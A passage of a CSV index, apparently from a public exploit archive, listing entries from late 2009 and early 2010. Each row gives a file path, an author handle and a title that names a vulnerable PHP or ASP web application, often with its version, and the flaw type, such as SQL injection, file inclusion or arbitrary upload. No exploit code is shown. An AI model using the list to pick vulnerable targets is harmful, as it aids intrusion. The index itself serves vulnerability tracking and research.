Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10691,exploits/php/webapps/10691.txt,"EZPX My Photoblog 1.2 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10692,exploits/php/webapps/10692.txt,"FreeForum 1.7 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10693,exploits/php/webapps/10693.txt,"FreeForum 1.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10694,exploits/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10695,exploits/php/webapps/10695.txt,"Lizard Cart - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10696,exploits/php/webapps/10696.txt,"epay - Backup",2009-12-26,indoushka,php,webapps, -10697,exploits/php/webapps/10697.txt,"e-pay 1.55 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10698,exploits/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,indoushka,php,webapps, -10699,exploits/php/webapps/10699.txt,"dB Masters MultiMedia - Insecure Cookie Handling",2009-12-26,indoushka,php,webapps, -10700,exploits/php/webapps/10700.txt,"Image File Upload - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10701,exploits/php/webapps/10701.txt,"HowMany 2.6 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10703,exploits/php/webapps/10703.txt,"kooora 3.0 - AR Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10704,exploits/php/webapps/10704.txt,"Mega Upload 1.45 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10705,exploits/php/webapps/10705.txt,"Gallery 2.3 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10706,exploits/php/webapps/10706.txt,"MyCart shopping cart - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10707,exploits/php/webapps/10707.txt,"osCommerce 2.2rc2a - Bypass/Create and Download Backup",2009-12-26,indoushka,php,webapps, -10708,exploits/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10710,exploits/php/webapps/10710.txt,"Green Desktiny Customer Support Helpdesk 2.3.1 - SQL Injection",2009-12-26,kaMtiEz,php,webapps, -10711,exploits/php/webapps/10711.txt,"phpAuction - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10712,exploits/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10713,exploits/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps, -10716,exploits/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php?id' SQL Injection",2009-12-26,The_HuliGun,php,webapps, -10717,exploits/php/webapps/10717.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion",2009-12-26,Gamoscu,php,webapps, -10718,exploits/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10719,exploits/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10720,exploits/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10721,exploits/php/webapps/10721.txt,"Nuked-klaN 1.7.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10722,exploits/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10725,exploits/php/webapps/10725.txt,"Nuke - SQL Injection",2009-12-27,FormatXformat,php,webapps, -10726,exploits/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",php,webapps, -10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,php,webapps, -10728,exploits/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps, -10729,exploits/php/webapps/10729.txt,"Joomla! Component com_adagency - Local File Inclusion",2009-12-27,FL0RiX,php,webapps, -10730,exploits/php/webapps/10730.txt,"Joomla! Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,php,webapps, -10731,exploits/php/webapps/10731.txt,"Joomla! Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps, -10732,exploits/php/webapps/10732.txt,"PHP upload - 'unijimpe' Arbitrary File Upload",2009-12-27,"wlhaan hacker",php,webapps, -10733,exploits/php/webapps/10733.txt,"com_webcamxp - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10734,exploits/php/webapps/10734.txt,"Joomla! Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,php,webapps, -10735,exploits/php/webapps/10735.txt,"com_jm-recommend - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,php,webapps, -10737,exploits/php/webapps/10737.txt,"Joomla! Component FacileForms - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10738,exploits/php/webapps/10738.txt,"Joomla! Component com_qpersonel - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10739,exploits/php/webapps/10739.txt,"Joomla! Component com_oprykningspoint_mc - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10740,exploits/php/webapps/10740.txt,"Joomla! Component com_trabalhe_conosco - Cross-Site Scripting",2009-12-27,Pyske,php,webapps, -10741,exploits/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps, -10742,exploits/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps, -10743,exploits/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps, -10750,exploits/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps, -10751,exploits/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps, -10752,exploits/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 -10753,exploits/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 -10754,exploits/multiple/webapps/10754.txt,"Joomla! Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 -10755,exploits/linux/webapps/10755.txt,"egegen turkish script - SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 -10756,exploits/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Arbitrary File Upload",2009-12-28,FormatXformat,linux,webapps,80 -10757,exploits/linux/webapps/10757.txt,"PHP Forum ohne My SQL - Arbitrary File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 -10758,exploits/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,php,webapps, -10760,exploits/php/webapps/10760.txt,"Joomla! Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,php,webapps, -10762,exploits/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",php,webapps, -10763,exploits/php/webapps/10763.txt,"Dren's PHP Uploader - Arbitrary File Upload",2009-12-28,"Cyb3r IntRue",php,webapps, -10767,exploits/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10770,exploits/asp/webapps/10770.txt,"PSnews - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10771,exploits/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download",2009-12-29,indoushka,asp,webapps, -10772,exploits/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Disclosure",2009-12-29,indoushka,asp,webapps, -10773,exploits/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10774,exploits/asp/webapps/10774.txt,"htmlArea 2.03 - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10775,exploits/asp/webapps/10775.txt,"Uguestbook - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10776,exploits/asp/webapps/10776.txt,"BaalASP 2.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10777,exploits/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10778,exploits/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10779,exploits/php/webapps/10779.txt,"DirectAdmin 1.34.0 - Cross-Site Request Forgery (Add Admin)",2009-12-29,SecurityRules,php,webapps, -10780,exploits/asp/webapps/10780.txt,"ASP Battle Blog - Database Disclosure",2009-12-29,indoushka,asp,webapps, -10781,exploits/php/webapps/10781.txt,"ActiveKB - Remote File Inclusion",2009-12-29,indoushka,php,webapps, -10784,exploits/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection",2009-12-29,R3VAN_BASTARD,php,webapps, -10788,exploits/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,php,webapps, -10789,exploits/php/webapps/10789.txt,"Joomla! Component com_noticia - Cross-Site Scripting",2009-12-29,Mr.tro0oqy,php,webapps, -10790,exploits/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps, -10792,exploits/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 -10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,php,webapps, -10794,exploits/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps, -10795,exploits/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps, -10796,exploits/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps, -10798,exploits/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps, -10800,exploits/php/webapps/10800.txt,"I-RATER Basic - Arbitrary File Upload",2009-12-30,indoushka,php,webapps, -10802,exploits/php/webapps/10802.txt,"PicMe 2.1.0 - Arbitrary File Upload",2009-12-30,indoushka,php,webapps, -10803,exploits/php/webapps/10803.txt,"UBBCentral UBB.Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,php,webapps, -10805,exploits/php/webapps/10805.txt,"Diesel Job Site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps, -10806,exploits/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,php,webapps, -10807,exploits/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,php,webapps, -10808,exploits/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,php,webapps, -10809,exploits/php/webapps/10809.txt,"I-Escorts Directory - 'country_escorts.php?country_id' SQL Injection",2009-12-30,R3d-D3V!L,php,webapps, -10810,exploits/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,php,webapps, -10811,exploits/php/webapps/10811.txt,"Joomla! Component com_intuit - Apache Directory listing Download",2009-12-30,indoushka,php,webapps, -10812,exploits/php/webapps/10812.txt,"WHOISCART - Scripting",2009-12-30,HAQIQ20,php,webapps, -10813,exploits/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross-Site Scripting",2009-12-30,indoushka,php,webapps, -10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,php,webapps, -10817,exploits/php/webapps/10817.txt,"Joomla! Component com_airmonoblock - Blind SQL Injection",2009-12-30,Pyske,php,webapps, -10819,exploits/asp/webapps/10819.txt,"gallery_show.asp - GID Blind SQL Injection",2009-12-30,R3d-D3V!L,asp,webapps, -10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,multiple,webapps, -10822,exploits/php/webapps/10822.txt,"Joomla! Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,php,webapps, -10823,exploits/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps, -10824,exploits/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps, -10828,exploits/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps, -10830,exploits/php/webapps/10830.txt,"Azadi Network - 'page' SQL Injection",2009-12-30,"Hussin X",php,webapps, -10831,exploits/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps, -10832,exploits/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps, -10833,exploits/php/webapps/10833.txt,"Classifieds Script - 'type' SQL Injection",2009-12-30,"Hussin X",php,webapps, -10835,exploits/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access",2009-12-30,Sora,php,webapps, -10836,exploits/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps, -10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10838,exploits/php/webapps/10838.txt,"list Web - 'addlink.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10839,exploits/php/webapps/10839.txt,"Classified Ads Scrip - 'store_info.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10841,exploits/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion",2009-12-31,cr4wl3r,php,webapps, -10844,exploits/php/webapps/10844.txt,"Joomla! Component com_portfol - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps, -10845,exploits/php/webapps/10845.txt,"fileNice PHP file browser - Local/Remote File Inclusion",2009-12-31,e.wiZz,php,webapps, -10846,exploits/php/webapps/10846.txt,"Weatimages - Directory Traversal / Local File Inclusion",2009-12-31,e.wiZz,php,webapps, -10847,exploits/php/webapps/10847.txt,"Joomla! Component com_mdigg - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps, -10850,exploits/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps, -10861,exploits/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps, -10869,exploits/php/webapps/10869.txt,"PhotoDiary 1.3 - 'lng' Local File Inclusion",2009-12-31,cOndemned,php,webapps, -10871,exploits/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps, -10872,exploits/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10873,exploits/php/webapps/10873.txt,"EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps, -10874,exploits/php/webapps/10874.txt,"Pre News Manager - 'nid' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10876,exploits/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps, -10877,exploits/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps, -10878,exploits/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps, -10880,exploits/php/webapps/10880.php,"bbScript 1.1.2.1 - 'id' Blind SQL Injection",2009-12-31,cOndemned,php,webapps, -10882,exploits/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-31,"D3V!L FUCKER",php,webapps, -10883,exploits/asp/webapps/10883.txt,"BlogWorx 1.0 Blog - Database Disclosure",2010-01-01,LionTurk,asp,webapps, -10884,exploits/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 - 'blogs.php?Id' SQL Injection",2010-01-01,BAYBORA,asp,webapps, -10885,exploits/php/webapps/10885.txt,"Cype CMS - SQL Injection",2010-01-01,Sora,php,webapps, -10889,exploits/php/webapps/10889.txt,"DS CMS 1.0 - 'NewsId' SQL Injection",2010-01-01,Palyo34,php,webapps, -10891,exploits/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps, -10897,exploits/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps, -10899,exploits/php/webapps/10899.txt,"XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection",2010-01-01,Gamoscu,php,webapps, -10901,exploits/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps, -10903,exploits/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps, -10905,exploits/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps, -10906,exploits/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps, -10910,exploits/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps, -10912,exploits/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Insecure Cookie Handling",2010-01-02,DigitALL,php,webapps, -10921,exploits/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps, -10923,exploits/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,php,webapps, -10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps, -10928,exploits/php/webapps/10928.txt,"Joomla! Component com_dailymeals - Local File Inclusion",2010-01-02,FL0RiX,php,webapps, -10929,exploits/php/webapps/10929.txt,"WordPress Plugin Events - SQL Injection",2010-01-02,Red-D3v1L,php,webapps, -10930,exploits/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,php,webapps, -10931,exploits/php/webapps/10931.txt,"X7CHAT 1.3.6b - Arbitrary Add Admin",2010-01-02,d4rk-h4ck3r,php,webapps, -10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,php,webapps, -10940,exploits/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure",2010-01-03,LionTurk,asp,webapps, -10941,exploits/php/webapps/10941.php,"Joomla! Component com_aprice - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps, -10942,exploits/php/webapps/10942.txt,"Joomla! Component com_cartweberp - Local File Inclusion",2010-01-03,FL0RiX,php,webapps, -10943,exploits/php/webapps/10943.txt,"Joomla! Component com_biblestudy - Local File Inclusion",2010-01-03,FL0RiX,php,webapps, -10944,exploits/php/webapps/10944.txt,"Joomla! Component com_bfsurvey_basic - SQL Injection",2010-01-03,FL0RiX,php,webapps, -10945,exploits/php/webapps/10945.php,"Joomla! Component com_bfsurvey_pro - 'catid' Blind SQL Injection",2010-01-03,FL0RiX,php,webapps, -10946,exploits/php/webapps/10946.txt,"Joomla! Component com_bfsurvey - Local File Inclusion",2010-01-03,FL0RiX,php,webapps, -10948,exploits/php/webapps/10948.txt,"Joomla! Component com_abbrev - Local File Inclusion",2010-01-03,FL0RiX,php,webapps, -10949,exploits/php/webapps/10949.txt,"Joomla! Component com_countries - SQL Injection",2010-01-03,FL0RiX,php,webapps, -10950,exploits/php/webapps/10950.txt,"Joomla! Component com_tpjobs - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps, -10952,exploits/php/webapps/10952.txt,"Joomla! Component com_alfresco - SQL Injection",2010-01-03,FL0RiX,php,webapps, -10953,exploits/php/webapps/10953.txt,"Joomla! Component com_hotbrackets - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps, -10955,exploits/asp/webapps/10955.txt,"MasterWeb Script 1.0 - 'details&newsID' SQL Injection",2010-01-03,Red-D3v1L,asp,webapps, -10962,exploits/php/webapps/10962.txt,"Live TV Script - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps, -10964,exploits/php/webapps/10964.txt,"Joomla! Component Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps, -10965,exploits/php/webapps/10965.txt,"Joomla! Component com_doqment - 'cid' SQL Injection",2010-01-03,Gamoscu,php,webapps, -10966,exploits/php/webapps/10966.txt,"Joomla! Component com_otzivi - Blind SQL Injection",2010-01-03,Cyber_945,php,webapps, -10967,exploits/php/webapps/10967.txt,"Rezervi 3.0.2 - 'mail.inc.php' Remote File Inclusion",2010-01-03,r00t.h4x0r,php,webapps, -10968,exploits/php/webapps/10968.txt,"portal modulnet 1.0 - 'id' SQL Injection",2010-01-03,Red-D3v1L,php,webapps, -10971,exploits/php/webapps/10971.txt,"Joomla! Component Bamboo Simpla Admin Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps, -10972,exploits/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps, -10974,exploits/php/webapps/10974.txt,"Simple Portal 2.0 - Authentication Bypass",2010-01-03,Red-D3v1L,php,webapps, -10976,exploits/php/webapps/10976.txt,"WorldPay Script Shop - 'productdetail' SQL Injection",2010-01-03,Err0R,php,webapps, -10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,php,webapps, -10978,exploits/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,php,webapps, -10979,exploits/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write",2010-01-03,"Ubik & er",php,webapps, -10981,exploits/php/webapps/10981.pl,"Smart Vision Script News - 'newsdetail.php' SQL Injection (2)",2010-01-04,darkmasking,php,webapps, -10983,exploits/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps, -10984,exploits/php/webapps/10984.txt,"Joomla! Component com_cartikads 1.0 - Arbitrary File Upload",2010-01-04,kaMtiEz,php,webapps, -10986,exploits/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - Remote File Inclusion",2010-01-04,indoushka,php,webapps, -10988,exploits/php/webapps/10988.txt,"Joomla! Component com_j-projects - Blind SQL Injection",2010-01-04,Pyske,php,webapps, -10991,exploits/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps, -10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps, -11002,exploits/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps, -11003,exploits/php/webapps/11003.txt,"LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps, -11005,exploits/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps, -11008,exploits/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Disclosure",2010-01-05,indoushka,asp,webapps, -11012,exploits/php/webapps/11012.txt,"ITaco Group ITaco.biz - 'view_news' SQL Injection",2010-01-06,Err0R,php,webapps, -11013,exploits/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",php,webapps, -11014,exploits/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps, -11015,exploits/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure",2010-01-06,indoushka,asp,webapps, -11016,exploits/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps, -11017,exploits/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,php,webapps, -11018,exploits/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps, -11019,exploits/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps, -11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps, -11024,exploits/php/webapps/11024.txt,"Joomla! Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps, -11025,exploits/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps, -11026,exploits/php/webapps/11026.php,"com_jembed - 'catid' Blind SQL Injection",2010-01-06,FL0RiX,php,webapps, -11028,exploits/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps, -11030,exploits/hardware/webapps/11030.txt,"D-Link DKVM-IP8 - Cross-Site Scripting",2010-01-06,POPCORN,hardware,webapps, -11031,exploits/php/webapps/11031.txt,"Milonic News - 'viewnews' SQL Injection",2010-01-06,Err0R,php,webapps, -11033,exploits/php/webapps/11033.txt,"Joomla! Component com_kk - Blind SQL Injection",2010-01-06,Pyske,php,webapps, -11035,exploits/php/webapps/11035.txt,"Joomla! Component com_king - Blind SQL Injection",2010-01-06,Pyske,php,webapps, -11036,exploits/php/webapps/11036.txt,"Roundcube Webmail - Multiple Vulnerabilities",2010-01-06,"j4ck & Globus",php,webapps, -11045,exploits/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,php,webapps, -11047,exploits/php/webapps/11047.txt,"Zeeways Technology - 'product_desc.php' SQL Injection",2010-01-07,Gamoscu,php,webapps, -11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,php,webapps, -11051,exploits/php/webapps/11051.txt,"AutoIndex PHP Script - 'index.php' Directory Traversal",2010-01-07,Red-D3v1L,php,webapps, -11057,exploits/php/webapps/11057.txt,"Read Excel Script 1.1 - Arbitrary File Upload",2010-01-07,Yozgat.Us,php,webapps, -11060,exploits/php/webapps/11060.txt,"Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-01-07,emgent,php,webapps,80 -11061,exploits/php/webapps/11061.txt,"Joomla! Component Regional Booking - 'id' Blind SQL Injection",2010-01-07,"Hussin X",php,webapps, -11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps, -11068,exploits/php/webapps/11068.txt,"Joomla! Component com_ksadvertiser - SQL Injection",2010-01-08,FL0RiX,php,webapps, -11069,exploits/php/webapps/11069.txt,"DELTAScripts PHPLinks - 'catid' SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps, -11071,exploits/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps, -11075,exploits/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local/Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps, -11076,exploits/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps, -11080,exploits/php/webapps/11080.txt,"ProArcadeScript to Game - SQL Injection",2010-01-10,Err0R,php,webapps, -11081,exploits/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injections",2010-01-10,Cyber_945,php,webapps, -11082,exploits/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps, -11083,exploits/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r & Ablus",php,webapps, -11085,exploits/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps, -11086,exploits/php/webapps/11086.txt,"Joomla! Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,php,webapps, -11087,exploits/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps, -11088,exploits/php/webapps/11088.txt,"Joomla! Component com_jcollection - Directory Traversal",2010-01-10,FL0RiX,php,webapps, -11089,exploits/php/webapps/11089.txt,"Joomla! Component com_jvideodirect - Directory Traversal",2010-01-10,FL0RiX,php,webapps, -11090,exploits/php/webapps/11090.txt,"Joomla! Component com_jashowcase - Directory Traversal",2010-01-10,FL0RiX,php,webapps, -11094,exploits/php/webapps/11094.txt,"Simply Classified 0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-10,mr_me,php,webapps, -11096,exploits/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure",2010-01-10,ViRuSMaN,asp,webapps, 